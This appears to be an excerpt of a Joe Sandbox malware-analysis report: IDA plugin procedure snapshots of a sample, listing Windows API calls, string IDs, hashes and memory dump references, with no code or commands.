                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.$bn
                                                                                                                                                                                                                                                                                                    • API String ID: 535116098-2837176596
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E241EA: _wcslen.LIBCMT ref: 00E241EF
                                                                                                                                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00E95919
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00E858AF
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                    • String ID: 0$$Container
                                                                                                                                                                                                                                                                                                    • API String ID: 3565006973-836522788
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00E4E67D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                    • Opcode ID: a3734159e5d4696e3e10d2c26d13daf14adfc200db61210c11200dbfd75ccfff
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c0d15d18f9f30d0c89c49cc7946371841c80d004c0eec1388c507e39d0f03dc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3734159e5d4696e3e10d2c26d13daf14adfc200db61210c11200dbfd75ccfff
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59516831544246DFCB25DF28D448AFA7BA0EF65314F289069F8E5BB2C0EB709D82CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00E3F6DB
                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E3F6F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f3e41c526d9d551ea91b10398e75c9d798c8734b1da1d7f2a34f1856a5e17d2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 707408b62249347db1673d1cdf3420ecb8205fffe2eccc7852057b9b827f69e9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3e41c526d9d551ea91b10398e75c9d798c8734b1da1d7f2a34f1856a5e17d2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B75148B14097589FD320AF11EC86BABBBF8FB94300F81885DF1D9611A1DF318529CB66
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00EB40BD
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EB40F8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87959761d9a4c026627c303a3f188ff0db3848c253f26f8eb659d0b1d9b4a546
                                                                                                                                                                                                                                                                                                    • Instruction ID: 07f94874c8199039f5e19d73e5f0bef7408404078fcfb8bfd7f4d76268339c00
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87959761d9a4c026627c303a3f188ff0db3848c253f26f8eb659d0b1d9b4a546
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 623190B1100604AEDB14DF78CC80EFB77A9FF48724F009619F995A7191DA71AC81CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00EB50BD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EB50D2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                    • Opcode ID: 931563f3ec3f963cf267ee71fb0be2fccf62644054e21920a0a2a239abb2dca5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a12dc583f0fab5e71eb80aa9ee6bef910fd5bb2d97940e800f51fedb2080989
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 931563f3ec3f963cf267ee71fb0be2fccf62644054e21920a0a2a239abb2dca5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B313575A0170A9FDB14DFA9C880BEEBBB5FF49304F20506AE904AB391D771A945CF90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00E63440
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00E634CA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 2181805148-2063206799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6afd018a29de6bc55c67ef92cf14ca95d60350f1b48785f25a100858edd1abe2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8c2d1238439d7bb0d03d024a19134e617f3cc628280faca3be1638683d2253e5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6afd018a29de6bc55c67ef92cf14ca95d60350f1b48785f25a100858edd1abe2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC21D230202164BFCB269F38EC49DB53BA6EF463A4F142248F7252B2F2C7318E55D610
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E278B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: GetStockObject.GDI32(00000011), ref: 00E278C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E27873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E278CF
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EB4216
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00EB4230
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 177704d5937b67fdd005538ac6576cd1acf882e4b39fdf9be55a945f3665defa
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f09c744a5c9767a9b413529321ab9c7c61ef3117f4b28485af926df8900d105
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 177704d5937b67fdd005538ac6576cd1acf882e4b39fdf9be55a945f3665defa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B61126B2610209AFDB01DFA9CC45AFA7BE8EF08318F015524F955E3261E634E850EB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E9D7C2
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E9D7EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                    • Opcode ID: 91f816e598fb11f59bb21f49e5a4e7305b355511fd630dfa25082f35dcb89f9b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6980587784c683782139f39520f754f293d7f30233e450c597d99ae0a36cd337
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91f816e598fb11f59bb21f49e5a4e7305b355511fd630dfa25082f35dcb89f9b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4211E9711092327DDB344BE68C85EF7BE5DEB127A8F10522BF509A3180D6649844D6F0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00E8761D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E87629
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4797e47cbff8604026ad50410e3598e75ba073bce3ed20d74a37ee4e95f63b92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1372eab66ad93d87e4081e4c962ccfaf72aca63583c6cf3503c12dafc2d89f4e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4797e47cbff8604026ad50410e3598e75ba073bce3ed20d74a37ee4e95f63b92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1101C432A189268BCB10BEFDDC409BF73B5BB607547601624E4ADB6191FB31D940E790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E82699
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 948be2d1b46985b79862d78a56a11739f7f0506edf71012062688e5b5e66905e
                                                                                                                                                                                                                                                                                                    • Instruction ID: c19619c799f1ce5905f37e4e7fe8c715515d822e3d57210b5fe8da958c0843eb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 948be2d1b46985b79862d78a56a11739f7f0506edf71012062688e5b5e66905e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01B175640229ABCB04FBA4CC51CFE77A8EF56360B00262AA93AB72D5EA7158089750
APIs
  • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
  • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00E82593
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 910357d7d5483cdc58743c906eb53ca47b66ae3a9b5dde4d946a4c9cd614619c
• Instruction ID: 6587606cb1116e328a614c9fc3ffbe83f32e7a03f1dc0817960d86cd2722b771
• Opcode Fuzzy Hash: 910357d7d5483cdc58743c906eb53ca47b66ae3a9b5dde4d946a4c9cd614619c
• Instruction Fuzzy Hash: 2801A775680119ABCB05F7A0D962DFF77E8DF55344F502019790BB72C1DA509E0887B2
APIs
  • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
  • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00E82615
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 1d19231c2a259b46bec27d6b602b4f577e663300cff0a820dfe8fcd96d2a5e33
• Instruction ID: 362a5220d0bdd8e117abc2add250064a3cf1f8ab2d9e66e16fa5daa251c2b689
• Opcode Fuzzy Hash: 1d19231c2a259b46bec27d6b602b4f577e663300cff0a820dfe8fcd96d2a5e33
• Instruction Fuzzy Hash: 8401D676A40119ABCB15F7A0D901EFF77E8DF15344F50302AB90AB3281EB619E08D7B1
APIs
  • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
  • Part of subcall function 00E845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00E84620
• SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E82720
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: ClassMessageNameSend_wcslen
• String ID: ComboBox$ListBox
• API String ID: 624084870-1403004172
• Opcode ID: 596f1b9a5c71ff47533ac9bb85c6b14d6b8ad95f69d5a3bc0287300e501be7aa
• Instruction ID: 79dc3360a3dc16fe5967592abfb8063d4c60052111d3383772259bd337df2af8
• Opcode Fuzzy Hash: 596f1b9a5c71ff47533ac9bb85c6b14d6b8ad95f69d5a3bc0287300e501be7aa
• Instruction Fuzzy Hash: EBF02875A40228ABCB04F3A49C41FFE73BCEF01390F40291AB52AB32C1DBA1580CC360
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00EB9B6D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00EB9B53
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageProcSend
                                                                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                                                                    • API String ID: 982171247-2063206799
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: 2<$j3
                                                                                                                                                                                                                                                                                                    • API String ID: 0-463933582
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB8471
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00EB847F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
